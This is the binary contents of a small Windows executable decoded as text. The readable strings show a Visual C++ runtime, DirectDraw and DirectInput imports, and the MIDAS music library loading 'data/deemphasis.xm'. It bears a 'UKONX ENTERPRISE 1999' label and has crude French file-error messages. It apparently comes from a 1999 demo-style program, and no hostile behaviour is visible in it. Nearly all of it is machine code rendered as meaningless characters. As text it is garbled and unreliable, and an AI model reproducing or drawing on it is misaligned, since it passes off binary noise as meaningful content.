MPQ&YYËeu/=x@uf.t$.h@YYÃ=x@uA.t$q.Yh@SUVW|$;=@Nj@D0tiWm1Yt<tujV1jM1Y;YtWA1YP@u  @3W0Yd0t U$/Y3% @@ _^][Vt$F ttvff 3YFF^Vt$u VY^V#Yt^F @tv0Y^3^SVt$ 3WF ȃu7ft1F>+~&WPv ;uF t$F N Ff_^[jYSVW33395`@~MH@t8H t0|$uP.YtC|$utPYu F;5`@||$t_^[Vt$F @t F f F u V0YFvvv FtltgV ‚u4NWt<@<@O_ႀu V ~uN t uFHFA^ F f^U SVuW;5@ƃ@@ƊPe} }tgubHt@< tMOED0 EjPuQ40@u: @jY;u@ @>mu35P1,Y&UUL0D0t ? u $E ME;ME<< t GEI9MsE@8 uE^ GEsEjPEEjP40@u  @uG}tAD0HtE< t GD1);} u } u jju } t GM9MGt0@u +} }E% @@ _^[á@tt$ЅYtjX33j9D$hP@@tu5@@3jXh@j5@@@uÃ%@%@j@@Xá@ @ ;sT$+P r3UU MSVA+q ZW΋ziK}D]M Muj?I_M ;v} L;LuHM sL!|D u+M!9$M L! uM!yL|yL|]y]O?vj?_MM+UMj?UIZ;ʉM vU ]]O;v;tkMQ;QuHM sL!TD u+M!$M L! uM!QMQIJMQIJU}u 9} M IJM JQJQJ;JucL MLs%}uM DD )}uOM YO 8]E\@ @=@H h@SQ׋ @@ P@ @@@@HC@HyCu `@xulSjp ס@pj5@@@@ȡ@+ȍLQHQP*E @;@v @ @E@5@_^[U@@SVWu;@uM; @u%@MB_^[á@ @VW3;u0DPP5@W5@@;ta@@@ @hAj5@4@;ljFt*jh hW@;ljF uvW5@@3N>~@F_^UQMSVWqA3ۅ|Cj?iZ0DE@@Jujy hhW@up;wuN@u NNC|5@Ƞ@_^][DVt$v &Ytw@u3 @ucjX@fF uR<@SW<@u S\YuFjFXFF ?^~>^fN jX_[^3^Ã|$Vt"t$ F t)Vf f&fY^ËD$ @ tPY^UHSVW} 3Gۉuu} M3Mu39U |xÊ@3 @E$R@MỦU؉UUUUxà t;t-tHHtYMPMGM>M5M,*u#EPYEM؉EEˍDAU*uEPYEMˍDAЉEIt.ht ltwMMM ?6u4uGGM} lUЋ @UDAtEPuP G} EPuPf %ÃgeXxCHHtpHHtl fE0uMuuEPfEYȉMu @MENf8@@E M@;ʉ}EfE0uMfEEPt;0PP# E}2E)Zt2 tHYEEEPYt3Ht,EtMEEeM@EPu guEEũEuHM@EPPEPH@ut}uPT@YguuPL@Y-u M}Wu!YiHHtQHHE'<+u @MNt8t@+EEEEt]EE0QEEHEEt;M5EPE Yt fMfME#M@E Et EPYAE t!E@EPt Y%YE@EPtYY3E@t|s؃ڀMEu}} Ee ueEEEM t;ERPWVEU#!uċ؃0uWV 9~]ԋEM뵍E+EEEEtM90uu M@M0E}]@t&tE-tE+ t E Eu+u+u uEPuVj EPEuuP2tuEPuVj0}tA}~;E]xfCPEPC=YY~2MQuPEPOuEPuuuEtEPuVj q} Gۉ} E_^[M@K@K@BL@yL@L@L@IM@UM IxE QuHYYEu]]VW|$O~!t$Vt$t$ >tO_^S\$ KVW~&|$t$WFt$Pu ?tK_^[ËD$@ËD$AQËD$f@á`@Vj^u;}ƣ`@jPYH@Yu!jV5`@YH@YujY3ɸ@H@ =H@|3ҹ@‹@tu B8@|^X=\@t UQQSV5@W} 3ۉ]]YuVYfF WtdF>+HNIN~WPS{ E 3tË@@@ t jjSt FMjE_WPS( E 9} _tN E% F ^[]UMS; @VWy@D0W39}}}u3W t jWQ @E 9}E}M+M ;Ms)ME uE @@ȍ+ʁ|̋+EjPWP40Ԡ@tCEE;| E+E ;Er3E;9}t_jX9EuL@ @ @EǍMWQuu 0Ԡ@t E}E @Eu)Y=D0@t E 8@= @+E% @@ _^[hhYYU@]@]EuMm]E@vjX3h@@th@Pt@tjVt$PeYt,F=0@~jP4YY @AuԊ 4@FFu^ËD$4@t :tH@u@t*t etEt@H80t8uH@A҈uËD$@rjX3UQQ}utEPX"E YYMMHÍEPj"E YYMU=@SVt']@3ɋQ3Ƀ8-M QYY8EQQ$#]VU CP3>-3ɅQ#>-E u-@~HWx 4@_3h@8 @Q!}YYtEF A80t<^Ky-Ad|jd^ÙA |j ^ÙYE ^[]À=@SUl$VWt*@\$5@;uG3Ƀ>-͋0`0D$QQ$"\$$VFP3>-P">-uE-}FjWY0YG~AjWv4@YvGY}(=@t;|SWISj0W_^][USVW}QQ$"@HI] @3Ƀ8-PSM Vh!@HI9 @ @@H@|!;}t Fu FSu WA uSu W_^[]t$@t$t$t$g%@t$ @t$ t$ H%@ U}et2}Et,}fuuu u ]uuu uuuu u]W|$ tVt$ Vj@PVV^_̀zuf\?f?f^٭^}@剕lݽ`ƅpa$؃#zuf\?f?f^٭^}@剕lݽ`ƅpɊaݽ`ɊaŊ$׊$ ؃#۽bۭbi@tƅpƅpt@۽bۭbi@t ƅpƅp۽bۭbi@t ۽bۭbi@t ƅpƅp-`@pƅp tËT$fT$l$étЧ@ËB%=tËB D$B  D$ $,$ BËD$%=tËD$f<$t,$Zf$f=tf tf t Z,$ZÃ$D$%$D$%t==t_f$f=t*f u!f tt{Z]Z,$Z@@s @@@v @UEEEEE UE]MEMEMEMPQR: Ef}tmUSu5Y Xu `jX  @MM @H @ @V;}4I+э4@& Ju5@=u @p=u @]=u @J=u @7=u @$=u @=u @5@jY5@Y^`QYE@ u p@[]ËT$ @9@V@t4I4@ ;s9u I^ @;s9t3Ã=@uk!V5@<"u%FF<"ttPCYtF>"u F < vF> wt< v^S39@VWu!5p@3:t<=tGV YtPY;5D@uj BY=p@8t9UW\ YE?=t"U;Yuj YW66YY8u]5p@Yp@_^@[UQQS39@VWuQ @hVS@@5T@8tEPEPSSWMEMP;ujqYEPEPEPVWEH5<@_^8@[UMESV!uW} Et7} 8"uDP@"t)t%A@t tF@tՊFt&F8"uF@CtF@A@t tF@ t t ūuHtfe8 t u@8t7} UE3ۀ8\u@C8"u,u%39}t x"Pu}} 39U‰UKtCt\FKutJ}u t? t:}t.tA@tF@FA@t@@Xt&Ft'E_^[]QQ@SU-X@VW333;u3Ջ;t @(\@;@;u Ջ;f9t@@f9u@@f9u+Ƌ=l@SS@SSPVSSD$4׋;t2U;YD$t#SSUPt$$VSSׅut$Y\$\$Vd@SuL;u \@;t<8t @8u@8u+@U Y;u3 UWVp Wh@3_^][YYUSVWUjjhpg@u6]_^[]ËL$AtD$T$SVWD$Pjhxg@d5d%D$ Xp t.;t$$t(4v L$H |uhD@Td _^[3d yxg@uQ R 9QuSQ@ SQ@MKCk Y[VC20XC00USVWU] E@EEEECs {ta v|tEVUkT]^] t3x<{SkVS vjDaC T{ v4롸UkjS]]_^[]UL$)APAPy]x@t u*=@u!h@YthYUU3ɸ(@;t A=@|V;(@x@u =@\hPj@u\h@PYY\WP\@YEEE t $@#Muj^@t Mt t t؃;u% @@>jVuEPuuu@;tVР@uV@ @PTYuM@ uMVS-YEY E <@e HD1uxttE tnjjS Eu= @tM?eEjPS u}uuSYYtjjSF u SY} uE t L0 D0_^[UQV}u:E #E#E VYE Ym ^ËD$%Pt$YYS\$3UWtjXt t t  t t VѾ #ֽttt;u  #^t ;u  _][t S\$3VtjXt t t t t ˺#ʾtt;t ;u ˁt u  ^[tUQEHw @ARV5 @DV^teMEj eEjXM jjjQPEPj(uE #E UQ=@SVWuEAZ ]j;^}%950@~ VS@YY @X#ƅue @DJte jE] X e ]VjMjQPEPW5@ t;uE EM _^[ËD$Vj YjD$YD$+ʃ҅uF}8uF|jX^3^ËD$SVWj \$YD$1uBW@PWVA_^[]U VEWPEPOYuYh@jj f@@@_@@@@@^UQU SVWfB%#ωE Bپ%ۉut;t<(!3;u;uEXfXK<] ȋE M Huɋ ٍ XߋM fH_^[jLYUXESVu WHMt+Ht$HtHtHtHHtHunjbj jjj[~QWS uAEtt teMF]ЃMNWQPESPEPhu>YYt=H@u VYu6gY_^[jjt$  D$L$ A@u|$tE*@#D$3ujXUSVWuY;5$@uj3;V3Ҹx@90tr0B=h@|EPV|@$j@3Y@@}5$@󫪉D@}MA;A@@j@3Y@@4R]@;t,Qt%;wUp@A@@;vAA9uE}rE<@P$@|@0@YD@UAAyHjXA@@=rVYD@<@<@30@ 9@t3_^[ËD$%@u@%D@u@%x@u@@ËD$-t"t t Ht3øøøøWj@Y3@@30@$@<@D@_UEVP5$@|@3@;rEƅ t7SWU ;w+ȍA ˃BBBu_[j5D@5$@PVPjj5$@VPVPV5D@j5$@VPVPh5D@\3ftA@@@tA@ 〠@@@AA;rI3ArZwA@Ȁ @@arzwA@ Ȁ @@@;r^Ã=@uj,Y@S39@VWuBh4@@@;tg5t@h(@Wօ@tPh@Wh@W@֣@@tЋ؅t@tSЋt$t$t$S@_^[3̋L$ WtzVSًt$|$uuo!FGIt%t)uuQt FGt/KuD$[^_tGIuulGKu[^D$_ÉIt~Ѓ3‹tބt,tt uƉ3҉3It 3IuuD$[^_US]V3;@Ë@DjVS$ EjVS W} +~ohVP譭hSE ;}PPS t+~׃= @u @ u SYY@}>ju SzSP<@Nu@  @ @juS< _ @ ^[UjhH@hPh@dPd%SVWe@3;u>EPj^VhD@V0@tEPVh@@VS4@jX@u$E;u@uuu uP4@9]u@ESSuu E @Pu8@E;tc]<ǃ$euWSV jXËe33M;t)uVuu ju8@;tuPVu0@3e̋Md _^[UjhX@hPh@dPd%SVWe39= @uFWWj[ShD@VW(@t @"WWSh@@VW,@" @9}~uuYYE @uuuuuu u,@9} u@E WWuuE$@Pu 8@؉];}$QeĉE܃MjXËe3}܃M]9}tfSuuuju 8@tMWWSuu u(@u;t2E t@9};uuuSuu u(@3eȋMd _^[E6$e܉]MjXËe33ۃMu;tVSuuu u(@t9}WWuWWuuVSh u l@;qlT$D$VJt 8t@Iu8^u+D$ËËT$Vt$ 3 2;r;sjXT$^ Vt$W|$V76 tFPj0 tFFPw0 tFFPw0 _^ËD$VW0x04? H׉p _H^ËD$VWPH ΉH _P^UE S]3;VEN@SSvQWE}SpSjEPSSZEeeEEPSEMu3_9Su(KC EsӾsuSEYfE^fC [U\SVW}EjE3ZE؉UEEE܉EEԉEЉEEE} t t t uGj^G w$@1| 9j:4@ujFÃ+tHHtjEX맃ejX란1U|9~:4@+t1-t,0tRCE~c{erjOj 1| 9V:4@Y0U90@~VPYYjZ @ÊA#ƅt}sEE0EEG:4@ug}UUu 0uMG90@~VP|YYjZ @ÊA#ƅt}sEE0EMG빀+ -90@U~VPYYjZ @ÊA#ƅWO1M|9~DÃ+ttHHtdjeU0uG19 1|9 j XO0uD} t*ÍO+MtHHMjXjXj OX o}E3=0@~jP/YY @ÊAtˍtAЁPG뾾Qu=0@~jPYY @ÊAtGOE }8jX9Ev}|EEEHEE}H8uMEEPEuPjE3Ƀ 9M}E9MuE9Mu+E=P~0E]uEU}t`3۸3E^=} EuPEPm U]‹uƋEʃ 33333333E}t3333EM E_qYfA E^f[׌@&@}@@@y@@@؎@]@G@@UES]VȾ#fWEEEEEEEEEEEE?EtC-C } fuu9}uf#C CC0f;uzf;u}t@uh@Fftu }u.h@;u#}uhx@CPYCYenhp@CPYCY‹ϋiMfej NfUkM} EEPEP f}?rEFPEPWYYEf3t}}~j_u?feEEP]MYu}ށ~ EPnNYuOCɉE~PMu}EPEPEPEPEPEMe0EMuEHHH5K|0;r89u0H;s@f*,CdE_^[;r 80uH;sf#C C0cjXUM3SVAMWjAM[A Mt EE XtEEHtEEHtEEHtEEHu EjP#˃ _HEыP ʉHEыP ʉHEыP#σ ʉHEыP#˃ ʉHtMI tMI tMI tM y tE X  #t4=t=t ;u(E E E ˉE #t =t ;u"E E EEM ʉE X EH ωH EEXE XPEHP ϋ}HPEX@EPSjuP@E@t&@t&@t&@t&Xt&ߋt%ItIt IuN !tItIu!#ʀ#ʀ@@_^[]U ESWj[t]tS^YtEtjDYEj"Y M#tXt(;M @@w]EnM @vp@@]EFM @v@p@]EM @p@w]EEV3tE ]E@EEPQQ$E ]} ]TE@s3ҊE fE;}+]tum]tMmHutE]EE ^tjYEtE t j xY3_[ËD$t~@"@!3UQ}EUQ}EUQ}E #E#M ȉM m EUQQMt -L@]t-L@]t -X@]t ؛ t]ËD$V;@sZȃ @TLt>%9t$ u |$ @uɀ f%^@ @ ^Q=L$r-=s+ȋą@PU$S] VufK 3WEE܉EEfF 3##ʁf=Ufff?w3:fuEVu39Fu 9uo3f;uESu9Cu9u FFkEEEE E} ~IƍKEE MEEM MQP1 tEfEmMuȃEEM } Ef}~%EuEP EYf}f}9Ef}}+EEEtEEPKYu}tMf}wE%=u5}u,e}uef}u EfEfEEEދEf=sfM fMNMNfF ff&~_^[U S@3Ƀ`9M tc}E @؉E `9MuEf9M tAVWE T} ;t'@f<4r }MuVurYY39M u_^[UQQEMEf] fEEUQQE@Vu 3]3fEueE u9MtWE@sjX3Eue E tM eNfe;tMEQQQ$P] 'EQQQ$:E ]f%EE0^%`@<ZV.hXF4|xl<"Vޱܲr̰ذβ <HVdrıұ>0 ү :Rpޮ̮@Cc 58Y}3Vl3! `C+3Vl3! `XWnA#'Nڲi߻l3! `l3! `K~  %YDEST %YDEST`RDESTaRDESTbDYDESTcDYDESTDY.DESTDY.DESTDY.DESTDY.DEST҈ɠn5mDESTmDESTmDESTmDESTmDESTmDESTmDESTmDEST rU<DESTmDESTmDEST`+oDESTa+oDESTp+oDEST T3ɠn5!T3ɠn5"T3ɠn5#T3ɠn5$T3ɠn5%T3ɠn5&T3ɠn5'T3ɠn5(T3ɠn5)T3ɠn5*T3ɠn5+T3ɠn5i@@ףp= @{Gz?{Gz@Q @Q?RQ? @ףp= @\(\?ffffff?p= ף?333333?P@Y@?r@r@?@Microsoft (R) Visual C++ (R)Anmerkung: Die Bestimmungen dieses Endbenutzer-Lizenzvertrags fr Visual C++ Autoren Edition lassen den Weitervertrieb der mit diesem Produkt erstellten ausfhrbaren Dateien nicht zu.: Microsoft Visual C++ ] ̎gp_񏑂̏ł́Aql{\tgEFAgpč쐬st@C̍ĔЕz͔F߂Ă܂BNote: The terms of the End User License Agreement for Visual C++ Introductory Edition do not permit redistribution of executables you create with this Product.:@:@EEE50P (8PX700WP `h````ppxxxx(null)(null)?~PAGAIsProcessorFeaturePresentKERNEL32e+000?5h!>@@runtime error TLOSS error SING error DOMAIN error R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data abnormal program termination R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point not loaded Microsoft Visual C++ Runtime Library Runtime Error! Program: ...GetLastActivePopupGetActiveWindowMessageBoxAuser32.dll-@1@@@A@E@1#QNAN1#INF1#IND1#SNAN_yn_y1_y0frexpfmod_hypot_cabsldexpmodffabsfloorceiltancossinsqrtatan2atanacosasintanhcoshsinhlog10logpowexpح0ЬPجpJܠh<ZV.hXF4|xl<"Vޱܲr̰ذβ <HVdrıұ>0 ү :Rpޮ̮_MIDASclose@0_MIDASgetErrorMessage@4_MIDASgetLastError@09_MIDASstartBackgroundPlay@4._MIDASsetMusicSyncCallback@8 _MIDASplayModule@8_MIDASloadModule@4_MIDASinit@0_MIDASconfig@00_MIDASsetOption@8:_MIDASstartup@0 _MIDASfreeModule@4<_MIDASstopModule@4midas11.dllDirectDrawCreateDDRAW.dllDirectInputCreateADINPUT.dllQueryPerformanceFrequencyQueryPerformanceCounterKERNEL32.dllDefWindowProcAPostQuitMessageEndPaint BeginPaintfShowCursorYCreateWindowExARegisterClassALoadCursorALoadIconAUSER32.dll_GetStockObjectGDI32.dllrGetUserDefaultLangIDHeapAlloc}ExitProcessTerminateProcessGetCurrentProcessHeapFree&GetModuleHandleAPGetStartupInfoAGetCommandLineAtGetVersionGetLastErrorCloseHandleReadFileHeapDestroyHeapCreateVirtualFreeVirtualAllocHeapReAllocjSetFilePointermSetHandleCountRGetStdHandleGetFileTypeWriteFile>GetProcAddressUnhandledExceptionFilter$GetModuleFileNameAFreeEnvironmentStringsAFreeEnvironmentStringsWWideCharToMultiByteGetEnvironmentStringsGetEnvironmentStringsW/RtlUnwind|SetStdHandleFlushFileBuffers4CreateFileAGetCPInfoGetACP1GetOEMCPLoadLibraryAaSetEndOfFileMultiByteToWideCharSGetStringTypeAVGetStringTypeWLCMapStringALCMapStringW RaiseExceptionMessageBoxA-@pS@@@T@rbca chie! -> impossible d'ouvrir le fichier: %s no enough memory!! for loading: %sread error: ca chie a la lecture de :%swbca chie! -> impossible d'ouvrir le fichier: %s ca chie a l ecriture de :%sMIDAS error: %s UKONXCLASSUKONX ENTERPRISE 1999UKONXCLASSdata/deemphasis.xmdata/fond.15us7@7@7@sincos1@ x@h@`@`@